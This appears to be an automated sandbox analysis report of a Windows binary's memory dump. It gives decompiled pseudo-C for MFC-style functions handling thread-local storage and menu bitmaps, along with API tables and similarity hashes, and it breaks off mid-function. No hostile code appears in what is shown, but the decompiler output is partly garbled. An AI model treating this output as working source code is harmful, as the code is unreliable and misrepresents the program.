				signed int _t52;
				int _t53;
				void* _t57;
				void* _t59;
				void* _t61;
				struct _CRITICAL_SECTION* _t63;
				void* _t64;
				void* _t65;
				long* _t67;
				void* _t68;

				_t54 = __ecx;
				_push(0x10);
				_t37 = E01285BE3(E012974CA, __ebx, __edi, __esi);
				_t67 = __ecx;
				 *(_t68 - 0x18) = __ecx;
				_t63 = __ecx + 0x1c;
				 *(_t68 - 0x14) = _t63;
				EnterCriticalSection(_t63);
				_t52 =  *(_t68 + 8);
				if(_t52 <= 0 || _t52 >= _t67[3]) {
					_push(_t63);
				} else {
					_t64 = TlsGetValue( *_t67);
					if(_t64 == 0) {
						_t53 = 0;
						 *(_t68 - 4) = 0;
						_t65 = E01270323(0x10);
						if(_t65 == 0) {
							_t65 = 0;
						} else {
							 *_t65 = 0x129b210;
						}
						 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
						 *(_t65 + 8) = _t53;
						 *(_t65 + 0xc) = _t53;
						_t40 = E0127072A( &(_t67[5]), _t65);
						_t54 = _t67[5];
						 *_t40 = _t67[5];
						_t67[5] = _t65;
						_t67 =  *(_t68 - 0x18);
						goto L10;
					} else {
						if(_t52 >=  *((intOrPtr*)(_t64 + 8)) &&  *(_t68 + 0xc) != 0) {
							_t53 = 0;
							L10:
							if( *(_t65 + 0xc) != _t53) {
								_t41 = E01267FCE(_t53, _t54, _t65, _t67, _t67[3], 4);
								_t57 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t50 = E01267FCE(_t53, _t54, _t65, _t67, _t67[3], 4);
								_pop(_t57);
								_t42 = LocalAlloc(_t53, _t50);
							}
							_t61 = _t42;
							if(_t61 == 0) {
								LeaveCriticalSection( *(_t68 - 0x14));
								E0126828F(_t57);
							}
							 *(_t65 + 0xc) = _t61;
							E01283870(_t61 +  *(_t65 + 8) * 4, _t53, _t67[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t67[3];
							_t37 = TlsSetValue( *_t67, _t65);
							_t52 =  *(_t68 + 8);
						}
					}
					_t59 =  *(_t65 + 0xc);
					if(_t59 != 0 && _t52 <  *(_t65 + 8)) {
						_t37 =  *(_t68 + 0xc);
						 *(_t59 + _t52 * 4) =  *(_t68 + 0xc);
					}
					_push( *(_t68 - 0x14));
				}
				LeaveCriticalSection();
				return E01285B48(_t37);
			}

















                                                                                                                0x012707fa
                                                                                                                0x012707fa
                                                                                                                0x01270801
                                                                                                                0x01270806
                                                                                                                0x01270808
                                                                                                                0x0127080b
                                                                                                                0x0127080f
                                                                                                                0x01270812
                                                                                                                0x01270818
                                                                                                                0x0127081d
                                                                                                                0x0127092d
                                                                                                                0x0127082c
                                                                                                                0x01270834
                                                                                                                0x01270838
                                                                                                                0x01270851
                                                                                                                0x01270855
                                                                                                                0x0127085d
                                                                                                                0x01270861
                                                                                                                0x0127086b
                                                                                                                0x01270863
                                                                                                                0x01270863
                                                                                                                0x01270863
                                                                                                                0x0127086d
                                                                                                                0x01270875
                                                                                                                0x01270878
                                                                                                                0x0127087b
                                                                                                                0x01270880
                                                                                                                0x01270883
                                                                                                                0x01270885
                                                                                                                0x01270888
                                                                                                                0x00000000
                                                                                                                0x0127083a
                                                                                                                0x0127083d
                                                                                                                0x0127084d
                                                                                                                0x0127088b
                                                                                                                0x0127088e
                                                                                                                0x012708ad
                                                                                                                0x012708b3
                                                                                                                0x012708b8
                                                                                                                0x01270890
                                                                                                                0x01270895
                                                                                                                0x0127089b
                                                                                                                0x0127089e
                                                                                                                0x0127089e
                                                                                                                0x012708be
                                                                                                                0x012708c2
                                                                                                                0x012708c7
                                                                                                                0x012708cd
                                                                                                                0x012708cd
                                                                                                                0x012708d5
                                                                                                                0x012708e6
                                                                                                                0x012708f1
                                                                                                                0x012708f7
                                                                                                                0x012708fd
                                                                                                                0x012708fd
                                                                                                                0x0127083d
                                                                                                                0x01270900
                                                                                                                0x01270905
                                                                                                                0x0127090c
                                                                                                                0x0127090f
                                                                                                                0x0127090f
                                                                                                                0x01270912
                                                                                                                0x01270912
                                                                                                                0x0127092e
                                                                                                                0x01270939

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 01270801
                                                                                                                • EnterCriticalSection.KERNEL32(?,00000010,01270706,?,00000000,?,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 01270812
                                                                                                                • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000,?,012837E8,01260000), ref: 0127082E
                                                                                                                • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA), ref: 0127089E
                                                                                                                • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA), ref: 012708B8
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000,?,012837E8), ref: 012708C7
                                                                                                                • _memset.LIBCMT ref: 012708E6
                                                                                                                • TlsSetValue.KERNEL32(?,00000000), ref: 012708F7
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000,?,012837E8,01260000), ref: 0127092E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$AllocLeaveLocalValue$EnterH_prolog3_catch_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4057217241-0
                                                                                                                • Opcode ID: 7a8807e211310b132cdf1d4732e26cd74c4965c7e881ab7bbdfb65605a269464
                                                                                                                • Instruction ID: 0cce7a2dbd43ce740788adb4c20494744571dc7330ac8f43a93afd7accfd7fad
                                                                                                                • Opcode Fuzzy Hash: 7a8807e211310b132cdf1d4732e26cd74c4965c7e881ab7bbdfb65605a269464
                                                                                                                • Instruction Fuzzy Hash: 9A31F070910706EFEB24AF28E889E2BFBB5FF45720B10812DF50597290CB71A894CF94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01262F63, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 116windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 32%
                                                                                                                			E01262F63(intOrPtr* __ebx, int __ecx, intOrPtr* __edi, void* __esi, int _a4, char _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v4;
				signed int _v16;
				struct tagMENUITEMINFOA _v60;
				intOrPtr _v68;
				signed int _v84;
				void _v152;
				signed int _v156;
				int _v160;
				int _v164;
				int _v220;
				unsigned int _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				void* __ebp;
				long _t102;
				intOrPtr _t103;
				int _t107;
				signed int _t110;
				signed char _t112;
				signed int _t113;
				unsigned int _t115;
				signed int _t118;
				signed short _t130;
				struct HINSTANCE__* _t135;
				signed int _t139;
				void* _t140;
				struct HBITMAP__* _t146;
				intOrPtr* _t153;
				signed int _t157;
				void* _t158;
				int _t162;
				intOrPtr _t163;
				intOrPtr* _t164;
				signed int _t166;
				signed int _t168;
				unsigned int _t170;
				intOrPtr _t173;
				intOrPtr _t174;
				void* _t175;
				intOrPtr* _t176;
				intOrPtr* _t177;
				unsigned int _t178;
				signed char* _t179;
				void* _t181;
				int _t183;
				int _t184;
				signed int* _t186;
				signed int* _t187;
				int _t188;
				char* _t190;
				void* _t192;
				void* _t196;
				void* _t197;
				void* _t198;
				signed int _t199;
				signed int _t200;
				void* _t202;
				signed int _t203;

				_t177 = __edi;
				_t162 = __ecx;
				_t153 = __ebx;
				_push(__esi);
				_t183 = __ecx;
				_t173 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t173 == 0) {
					_t103 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t103 == 0) {
						goto L8;
					} else {
						_t102 = SendMessageA( *(_t103 + 0x20), 0x87, 0, 0);
						if((_t102 & 0x00002000) != 0) {
							_t102 = SendMessageA( *( *((intOrPtr*)(_t183 + 0x14)) + 0x20), 0xf1, _a4, 0);
						}
						goto L7;
					}
				} else {
					if( *((intOrPtr*)(__ecx + 0x10)) != 0) {
						L7:
						return _t102;
					} else {
						_t162 =  *(__ecx + 8);
						if(_t162 >=  *((intOrPtr*)(__ecx + 0x20))) {
							L8:
							E01268275(_t162);
							asm("int3");
							_t197 = _t202;
							_t184 = _t162;
							_t174 =  *_t184;
							_t107 =  *(_t174 + 4)(0 | _v4 != 0x00000000, _t183, _t196);
							if( *((intOrPtr*)(_t184 + 0xc)) == 0 ||  *((intOrPtr*)(_t184 + 0x10)) != 0) {
								L14:
								return _t107;
							} else {
								if( *(_t184 + 8) >=  *((intOrPtr*)(_t184 + 0x20))) {
									E01268275(_t162);
									asm("int3");
									_push(_t197);
									_t198 = _t202;
									_t110 = _v16;
									_t203 = _t202 - 0x30;
									if(_t110 == 0) {
										L23:
										E01268275(_t162);
										asm("int3");
										_push(_t198);
										_t199 = _t203;
										_t163 = _v68;
										if(_t163 == 0) {
											L55:
											_t112 = E01268275(_t163);
											asm("fidiv word [eax]");
											_t186 = _t184 + _t203;
											 *_t186 =  *_t186 ^ _t112;
											_t187 = _t186 + _t199;
											 *_t187 =  *_t187 ^ _t112;
											_t164 = _t163 + _t177;
											 *_t187 =  *_t187 ^ _t112;
											 *_t164 =  *_t164 + _t112;
											 *_t187 =  *_t187 ^ _t203;
											 *_t187 =  *_t187 + _t174;
											 *_t187 =  *_t187 ^ _t203;
											 *_t177 =  *_t177 + _t203;
											 *_t187 =  *_t187 ^ _t203;
											 *_t153 =  *_t153 + _t177;
											 *_t187 =  *_t187 ^ _t203;
											 *((intOrPtr*)(_t177 + 0x31)) =  *((intOrPtr*)(_t177 + 0x31)) + _t164;
											 *[es:eax+0x31] =  *[es:eax+0x31] + _t199;
											 *[es:eax+0x31] =  *[es:eax+0x31] + _t177;
											 *[es:eax+0x55012631] =  *[es:eax+0x55012631] + _t112;
											_push(_t199);
											_t200 = _t203;
											_t113 =  *0x12aa3f0; // 0xddd5d539
											_v84 = _t113 ^ _t200;
											_push(_t153);
											_push(_t187);
											_push(_t177);
											_t115 = GetMenuCheckMarkDimensions();
											_t188 = _t115;
											_t178 = _t115 >> 0x10;
											_v220 = _t188;
											_v224 = _t178;
											if(_t188 <= 4 || _t178 <= 5) {
												E01268275(_t164);
												asm("int3");
												_push(_t200);
												_t118 = E01283D96(_v232, _v228, 0x10);
												asm("sbb eax, eax");
												return  ~_t118 + 1;
											} else {
												if(_t188 > 0x20) {
													_t188 = 0x20;
													_v160 = _t188;
												}
												_t82 = _t188 - 4; // 0x1c
												asm("cdq");
												_t83 = _t188 + 0xf; // 0x2f
												_t166 = _t83 >> 4;
												_v156 = _t166;
												_t157 = (_t82 - _t174 >> 1) + (_t166 << 4) - _t188;
												if(_t157 > 0xc) {
													_t157 = 0xc;
												}
												if(_t178 > 0x20) {
													_t178 = 0x20;
													_v164 = _t178;
												}
												E01283870( &_v152, 0xff, 0x80);
												_t168 = _v156;
												_t88 = _t178 - 6; // 0x1a
												_t179 = 0x12997c8;
												_t175 = 5;
												_t190 =  &_v152 + (_t88 >> 1) * _t168 * 2;
												_v156 = _t168 + _t168;
												do {
													_t130 = ( *_t179 & 0x000000ff) << _t157;
													_t179 =  &(_t179[1]);
													_t170 =  !_t130 & 0x0000ffff;
													 *(_t190 + 1) = _t170;
													 *_t190 = _t170 >> 8;
													_t190 = _t190 + _v156;
													_t175 = _t175 - 1;
												} while (_t175 != 0);
												_t135 = CreateBitmap(_v160, _v164, "true", "true",  &_v152);
												 *0x1389e50 = _t135;
												_pop(_t181);
												_pop(_t192);
												_pop(_t158);
												if(_t135 == 0) {
													 *0x1389e50 = LoadBitmapW(_t135, 0x7fe3);
												}
												return E012833E5(_t158, _v60.dwTypeData ^ _t200, _t175, _t181, _t192);
											}
										} else {
											_t176 = _a16;
											_push(_t153);
											if(_t176 == 0) {
												_t139 = _a12 + 0xffffffc6;
												_push(_t184);
												if(_t139 > 0xb) {
													_t140 = 0;
													goto L53;
												} else {
													switch( *((intOrPtr*)(_t139 * 4 +  &M0126319B))) {
														case 0:
															_a4();
															goto L51;
														case 1:
															__eax = _a4();
															goto L50;
														case 2:
															_t46 =  &_v4; // 0x8b0d6a56
															_push( *_t46);
															goto L32;
														case 3:
															_t48 =  &_v4; // 0x8b0d6a56
															_push( *_t48);
															goto L49;
														case 4:
															_t49 =  &_a8; // 0x50ffce8b
															__eax =  *_t49;
															if(__eax == 0) {
																goto L55;
															} else {
																_push( *__eax);
																_push( *((intOrPtr*)(__eax + 4)));
																__eax = _a4();
																goto L51;
															}
															goto L71;
														case 5:
															_t52 =  &_a8; // 0x50ffce8b
															__eax =  *_t52;
															if(__eax == 0) {
																goto L55;
															} else {
																_push( *__eax);
																_push( *((intOrPtr*)(__eax + 4)));
																__eax = _a4();
																goto L50;
															}
															goto L71;
														case 6:
															_t55 =  &_a8; // 0x50ffce8b
															__eax =  *_t55;
															if(__eax == 0) {
																goto L55;
															} else {
																_push( *__eax);
																_push( *((intOrPtr*)(__eax + 4)));
																_t57 =  &_v4; // 0x8b0d6a56
																_push( *_t57);
																__eax = _a4();
																goto L51;
															}
															goto L71;
														case 7:
															_t59 =  &_a8; // 0x50ffce8b
															__eax =  *_t59;
															if(__eax == 0) {
																goto L55;
															} else {
																_push( *__eax);
																_push( *((intOrPtr*)(__eax + 4)));
																_t61 =  &_v4; // 0x8b0d6a56
																_push( *_t61);
																__eax = _a4();
																goto L50;
															}
															goto L71;
														case 8:
															_t63 =  &_a8; // 0x50ffce8b
															__esi =  *_t63;
															if(__esi == 0) {
																goto L55;
															} else {
																_push(__esi);
																__eax = _a4();
																goto L44;
															}
															goto L71;
														case 9:
															_t70 =  &_a8; // 0x50ffce8b
															__esi =  *_t70;
															if(__esi == 0) {
																goto L55;
															} else {
																_t71 =  &_v4; // 0x8b0d6a56
																_push( *_t71);
																_push(__esi);
																__eax = _a4();
																L44:
																0 = 0 |  *(__esi + 0x1c) == 0x00000000;
																 *(__esi + 0x1c) =  *(__esi + 0x1c) & 0x00000000;
																goto L51;
															}
															goto L71;
														case 0xa:
															_t73 =  &_a8; // 0x50ffce8b
															_push( *_t73);
															L32:
															__eax = _a4();
															goto L51;
														case 0xb:
															_t74 =  &_a8; // 0x50ffce8b
															_push( *_t74);
															L49:
															__eax = _a4();
															L50:
															__ebx = __eax;
															L51:
															_t140 = 1;
															L53:
															goto L54;
													}
												}
											} else {
												 *((intOrPtr*)(_t176 + 4)) = _a4;
												_t140 = 1;
												 *_t176 = _t163;
												L54:
												return _t140;
											}
										}
									} else {
										_t174 =  *((intOrPtr*)(_t162 + 0xc));
										if(_t174 == 0) {
											if(_t162 != 0) {
												_push(_t110);
												return E0126FDF6(_t153, _t174, _t177,  *((intOrPtr*)(_t162 + 0x20)));
											}
											goto L23;
										} else {
											if( *((intOrPtr*)(_t162 + 0x10)) != 0) {
												return _t110;
											} else {
												_push(_t184);
												_t184 =  *(_t162 + 8);
												if(_t184 <  *((intOrPtr*)(_t162 + 0x20))) {
													_v60.dwTypeData = _t110;
													_v60.cbSize = 0x30;
													_v60.fMask = 0x40;
													return SetMenuItemInfoA( *(_t174 + 4), _t184, "true",  &_v60);
												}
												goto L23;
											}
										}
									}
								} else {
									_t146 =  *0x1389e50; // 0x0
									if(_t146 != 0) {
										L13:
										_t107 = SetMenuItemBitmaps( *( *((intOrPtr*)(_t184 + 0xc)) + 4),  *(_t184 + 8), 0x400, 0, _t146);
									} else {
										L56();
										_t107 =  *0x1389e50; // 0x0
										if(_t107 != 0) {
											goto L13;
										}
									}
									goto L14;
								}
							}
						} else {
							asm("sbb eax, eax");
							_t102 = CheckMenuItem( *(_t173 + 4), _t162,  ~_a4 & 0x00000008 | 0x00000400);
							goto L7;
						}
					}
				}
				L71:
			}





























































                                                                                                                0x01262f63
                                                                                                                0x01262f63
                                                                                                                0x01262f63
                                                                                                                0x01262f66
                                                                                                                0x01262f67
                                                                                                                0x01262f69
                                                                                                                0x01262f6e
                                                                                                                0x01262f9a
                                                                                                                0x01262f9f
                                                                                                                0x00000000
                                                                                                                0x01262fa1
                                                                                                                0x01262fad
                                                                                                                0x01262fb8
                                                                                                                0x01262fca
                                                                                                                0x01262fca
                                                                                                                0x00000000
                                                                                                                0x01262fb8
                                                                                                                0x01262f70
                                                                                                                0x01262f74
                                                                                                                0x01262fd0
                                                                                                                0x01262fd2
                                                                                                                0x01262f76
                                                                                                                0x01262f76
                                                                                                                0x01262f7c
                                                                                                                0x01262fd5
                                                                                                                0x01262fd5
                                                                                                                0x01262fda
                                                                                                                0x01262fdc
                                                                                                                0x01262fe1
                                                                                                                0x01262fe9
                                                                                                                0x01262fec
                                                                                                                0x01262ff3
                                                                                                                0x01263031
                                                                                                                0x01263033
                                                                                                                0x01262ffb
                                                                                                                0x01263001
                                                                                                                0x01263036
                                                                                                                0x0126303b
                                                                                                                0x0126303c
                                                                                                                0x0126303d
                                                                                                                0x0126303f
                                                                                                                0x01263042
                                                                                                                0x01263047
                                                                                                                0x01263099
                                                                                                                0x01263099
                                                                                                                0x0126309e
                                                                                                                0x0126309f
                                                                                                                0x012630a0
                                                                                                                0x012630a2
                                                                                                                0x012630a7
                                                                                                                0x01263194
                                                                                                                0x01263194
                                                                                                                0x0126319b
                                                                                                                0x0126319d
                                                                                                                0x012631a0
                                                                                                                0x012631a2
                                                                                                                0x012631a4
                                                                                                                0x012631a6
                                                                                                                0x012631a8
                                                                                                                0x012631aa
                                                                                                                0x012631ac
                                                                                                                0x012631ae
                                                                                                                0x012631b0
                                                                                                                0x012631b2
                                                                                                                0x012631b4
                                                                                                                0x012631b6
                                                                                                                0x012631b8
                                                                                                                0x012631ba
                                                                                                                0x012631bd
                                                                                                                0x012631c1
                                                                                                                0x012631c5
                                                                                                                0x012631cb
                                                                                                                0x012631cc
                                                                                                                0x012631d4
                                                                                                                0x012631db
                                                                                                                0x012631de
                                                                                                                0x012631df
                                                                                                                0x012631e0
                                                                                                                0x012631e1
                                                                                                                0x012631e7
                                                                                                                0x012631ed
                                                                                                                0x012631f0
                                                                                                                0x012631f6
                                                                                                                0x012631ff
                                                                                                                0x012632fc
                                                                                                                0x01263301
                                                                                                                0x01263302
                                                                                                                0x0126330d
                                                                                                                0x01263317
                                                                                                                0x0126331b
                                                                                                                0x0126320e
                                                                                                                0x01263211
                                                                                                                0x01263215
                                                                                                                0x01263216
                                                                                                                0x01263216
                                                                                                                0x0126321c
                                                                                                                0x0126321f
                                                                                                                0x01263220
                                                                                                                0x01263223
                                                                                                                0x0126322a
                                                                                                                0x01263237
                                                                                                                0x0126323c
                                                                                                                0x01263240
                                                                                                                0x01263240
                                                                                                                0x01263244
                                                                                                                0x01263248
                                                                                                                0x01263249
                                                                                                                0x01263249
                                                                                                                0x01263260
                                                                                                                0x01263265
                                                                                                                0x0126326b
                                                                                                                0x0126327c
                                                                                                                0x01263283
                                                                                                                0x01263284
                                                                                                                0x0126328a
                                                                                                                0x01263290
                                                                                                                0x01263295
                                                                                                                0x01263298
                                                                                                                0x0126329c
                                                                                                                0x012632a1
                                                                                                                0x012632a7
                                                                                                                0x012632a9
                                                                                                                0x012632af
                                                                                                                0x012632af
                                                                                                                0x012632cb
                                                                                                                0x012632d1
                                                                                                                0x012632d6
                                                                                                                0x012632d7
                                                                                                                0x012632d8
                                                                                                                0x012632db
                                                                                                                0x012632e9
                                                                                                                0x012632e9
                                                                                                                0x012632fb
                                                                                                                0x012632fb
                                                                                                                0x012630ad
                                                                                                                0x012630ad
                                                                                                                0x012630b0
                                                                                                                0x012630b6
                                                                                                                0x012630ca
                                                                                                                0x012630cd
                                                                                                                0x012630d1
                                                                                                                0x0126318c
                                                                                                                0x00000000
                                                                                                                0x012630d7
                                                                                                                0x012630d7
                                                                                                                0x00000000
                                                                                                                0x012630de
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012630e6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012630ee
                                                                                                                0x012630ee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012630f9
                                                                                                                0x012630f9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01263101
                                                                                                                0x01263101
                                                                                                                0x01263106
                                                                                                                0x00000000
                                                                                                                0x0126310c
                                                                                                                0x0126310c
                                                                                                                0x0126310e
                                                                                                                0x01263111
                                                                                                                0x00000000
                                                                                                                0x01263111
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01263116
                                                                                                                0x01263116
                                                                                                                0x0126311b
                                                                                                                0x00000000
                                                                                                                0x0126311d
                                                                                                                0x0126311d
                                                                                                                0x0126311f
                                                                                                                0x01263122
                                                                                                                0x00000000
                                                                                                                0x01263122
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01263127
                                                                                                                0x01263127
                                                                                                                0x0126312c
                                                                                                                0x00000000
                                                                                                                0x0126312e
                                                                                                                0x0126312e
                                                                                                                0x01263130
                                                                                                                0x01263133
                                                                                                                0x01263133
                                                                                                                0x01263136
                                                                                                                0x00000000
                                                                                                                0x01263136
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0126313b
                                                                                                                0x0126313b
                                                                                                                0x01263140
                                                                                                                0x00000000
                                                                                                                0x01263142
                                                                                                                0x01263142
                                                                                                                0x01263144
                                                                                                                0x01263147
                                                                                                                0x01263147
                                                                                                                0x0126314a
                                                                                                                0x00000000
                                                                                                                0x0126314a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0126314f
                                                                                                                0x0126314f
                                                                                                                0x01263154
                                                                                                                0x00000000
                                                                                                                0x01263156
                                                                                                                0x01263156
                                                                                                                0x01263157
                                                                                                                0x00000000
                                                                                                                0x01263157
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01263168
                                                                                                                0x01263168
                                                                                                                0x0126316d
                                                                                                                0x00000000
                                                                                                                0x0126316f
                                                                                                                0x0126316f
                                                                                                                0x0126316f
                                                                                                                0x01263172
                                                                                                                0x01263173
                                                                                                                0x0126315a
                                                                                                                0x0126315f
                                                                                                                0x01263162
                                                                                                                0x00000000
                                                                                                                0x01263162
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01263178
                                                                                                                0x01263178
                                                                                                                0x012630f1
                                                                                                                0x012630f1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01263180
                                                                                                                0x01263180
                                                                                                                0x01263183
                                                                                                                0x01263183
                                                                                                                0x01263186
                                                                                                                0x01263186
                                                                                                                0x01263188
                                                                                                                0x01263188
                                                                                                                0x0126318e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012630d7
                                                                                                                0x012630b8
                                                                                                                0x012630bb
                                                                                                                0x012630be
                                                                                                                0x012630c0
                                                                                                                0x0126318f
                                                                                                                0x01263191
                                                                                                                0x01263191
                                                                                                                0x012630b6
                                                                                                                0x01263049
                                                                                                                0x01263049
                                                                                                                0x0126304e
                                                                                                                0x01263088
                                                                                                                0x0126308a
                                                                                                                0x00000000
                                                                                                                0x0126308e
                                                                                                                0x00000000
                                                                                                                0x01263050
                                                                                                                0x01263054
                                                                                                                0x01263096
                                                                                                                0x01263056
                                                                                                                0x01263056
                                                                                                                0x01263057
                                                                                                                0x0126305d
                                                                                                                0x0126305f
                                                                                                                0x01263069
                                                                                                                0x01263070
                                                                                                                0x00000000
                                                                                                                0x01263080
                                                                                                                0x00000000
                                                                                                                0x0126305d
                                                                                                                0x01263054
                                                                                                                0x0126304e
                                                                                                                0x01263003
                                                                                                                0x01263003
                                                                                                                0x0126300a
                                                                                                                0x0126301a
                                                                                                                0x0126302b
                                                                                                                0x0126300c
                                                                                                                0x0126300c
                                                                                                                0x01263011
                                                                                                                0x01263018
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01263018
                                                                                                                0x00000000
                                                                                                                0x0126300a
                                                                                                                0x01263001
                                                                                                                0x01262f7e
                                                                                                                0x01262f83
                                                                                                                0x01262f92
                                                                                                                0x00000000
                                                                                                                0x01262f92
                                                                                                                0x01262f7c
                                                                                                                0x01262f74
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • CheckMenuItem.USER32(?,?,?), ref: 01262F92
                                                                                                                  • Part of subcall function 0126FDF6: _strlen.LIBCMT ref: 0126FE1B
                                                                                                                  • Part of subcall function 0126FDF6: _memset.LIBCMT ref: 0126FE37
                                                                                                                  • Part of subcall function 0126FDF6: GetWindowTextA.USER32 ref: 0126FE51
                                                                                                                  • Part of subcall function 0126FDF6: lstrcmpA.KERNEL32(00000000,01263093), ref: 0126FE63
                                                                                                                  • Part of subcall function 0126FDF6: SetWindowTextA.USER32(?,01263093), ref: 0126FE6F
                                                                                                                • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 01262FAD
                                                                                                                • SendMessageA.USER32(?,000000F1,?,00000000), ref: 01262FCA
                                                                                                                • SetMenuItemBitmaps.USER32(?,?,00000400,00000000,00000000), ref: 0126302B
                                                                                                                • SetMenuItemInfoA.USER32(?,?,?,?), ref: 0126307A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$MessageSendTextWindow$BitmapsCheckInfo_memset_strlenlstrcmp
                                                                                                                • String ID: 0$@
                                                                                                                • API String ID: 2629736728-1545510068
                                                                                                                • Opcode ID: fbc9bed6e2604a5c48d73e2105ea10f3ea49e6022453323ad910e1d2ed710ca5
                                                                                                                • Instruction ID: 8488d23389bca2e6683b1f2c1f8c35f6136aec252ed6a72a1a07933aabc368a8
                                                                                                                • Opcode Fuzzy Hash: fbc9bed6e2604a5c48d73e2105ea10f3ea49e6022453323ad910e1d2ed710ca5
                                                                                                                • Instruction Fuzzy Hash: F041A071220206EFEB25DF69DC48F66BBADFB14315F108529F6099A5D1C7B1E8C4CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127620F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E0127620F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, signed int __esi, void* __eflags) {
				intOrPtr _t50;
				void* _t51;
				signed int _t63;
				signed int _t66;
				void* _t71;
				signed int _t78;
				void* _t83;
				signed int _t84;
				intOrPtr* _t86;
				void* _t88;

				_t87 = __esi;
				_t83 = __edx;
				_push(0x80);
				E01285BAD(E01297C5C, __ebx, __edi, __esi);
				_t86 = __ecx;
				_t50 =  *((intOrPtr*)(_t88 + 8));
				 *(_t88 - 0x50) = 0;
				 *((intOrPtr*)(_t88 - 0x54)) = 0x129a6cc;
				 *(_t88 - 4) = 0;
				if(_t50 == 0 ||  *(_t50 + 4) == 0) {
					_t87 = GetStockObject;
					_t51 = GetStockObject(0x11);
					 *(_t88 - 0x50) = _t51;
					if(_t51 != 0) {
						L5:
						_t50 = _t88 - 0x54;
						goto L6;
					} else {
						_t71 = GetStockObject(0xd);
						 *(_t88 - 0x50) = _t71;
						if(_t71 != 0) {
							goto L5;
						} else {
							 *((intOrPtr*)(_t86 + 0x64)) = 0;
						}
					}
				} else {
					L6:
					_t11 = _t50 + 4; // 0x12695fe
					GetObjectA( *_t11, 0x3c, _t88 - 0x4c);
					 *(_t88 - 0x78) = 0x20;
					_push(_t88 - 0x30);
					E012633C1(0, _t88 - 0x58, _t86, _t87, __eflags);
					_t87 =  *(_t88 - 0x4c);
					 *((intOrPtr*)(_t88 - 0x74)) =  *((intOrPtr*)(_t88 - 0x58));
					 *((short*)(_t88 - 0x68)) =  *((intOrPtr*)(_t88 - 0x3c));
					 *((short*)(_t88 - 0x66)) =  *(_t88 - 0x35) & 0x000000ff;
					 *(_t88 - 0x64) =  *(_t88 - 0x38) & 0x000000ff;
